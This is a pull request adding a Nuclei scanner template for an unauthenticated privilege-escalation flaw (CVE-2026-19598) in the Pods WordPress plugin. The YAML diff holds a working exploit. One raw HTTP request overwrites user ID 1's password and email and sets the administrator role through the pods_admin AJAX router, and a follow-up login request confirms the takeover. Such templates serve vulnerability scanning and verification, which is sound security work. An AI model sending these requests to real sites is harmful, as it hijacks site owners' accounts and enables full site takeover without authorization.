### PR TITLE
CVE-2026-19598 - Pods <= 3.3.9 - Unauthenticated Privilege Escalation via pods_admin AJAX Router

### DIFF
--- a/http/cves/2026/CVE-2026-19598.yaml
+++ b/http/cves/2026/CVE-2026-19598.yaml
@@ -1,0 +1,67 @@
+id: CVE-2026-19598
+
+info:
+  name: Pods <= 3.3.9 - Unauthenticated Privilege Escalation via pods_admin AJAX Router
+  author: DhiyaneshDk
+  severity: critical
+  description: |
+    The Pods – Custom Content Types and Fields plugin for WordPress is vulnerable to Privilege Escalation via Authorization Bypass in all versions up to, and including, 3.3.9. The vulnerability exists because the pods_admin AJAX router funnels every access check — including the method allowlist, nonce verification, login enforcement, and capability gate — through pods_error(), which under the JSON meta-box-loader compatibility path only writes failures to the PHP error log and returns false instead of terminating the request, rendering all guards ineffective. This makes it possible for unauthenticated attackers to escalate their privileges to Administrator or overwrite the password of any user account, including the site owner's, enabling complete site takeover, or perform another administrator action.
+  impact: |
+    Unauthenticated attackers can escalate to administrator or overwrite any user password, enabling full site takeover.
+  remediation: |
+    Update to the latest version beyond 3.3.9.
+  reference:
+    - https://www.wordfence.com/blog/2026/08/100000-wordpress-sites-affected-by-privilege-escalation-vulnerability-in-pods-wordpress-plugin/
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-19598
+    - https://pods.io/2026/08/14/pods-3-3-9-1-security-release-and-backported-releases/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-19598
+    cwe-id: CWE-863
+    epss-score: 0.00427
+  metadata:
+    max-request: 2
+    verified: true
+    product: pods
+    vendor: podsfoundation
+  tags: cve,cve2026,wordpress,wp-plugin,pods,privesc,unauth,intrusive
+
+variables:
+  passwd: "{{to_lower(rand_text_alpha(12))}}"
+  email: "{{to_lower(rand_text_alpha(8))}}@pods.nuclei"
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php?meta-box-loader=1 HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+        X-Requested-With: XMLHttpRequest
+        Content-Type: application/x-www-form-urlencoded
+
+        action=pods_admin&method=save_user&ID=1&user_pass={{passwd}}&user_email={{email}}&role=administrator
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "content_length <= 3"
+          - "contains(body, '1')"
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{email}}&pwd={{passwd}}&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(to_lower(header), 'wordpress_logged_in')"


### PR DESCRIPTION
### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
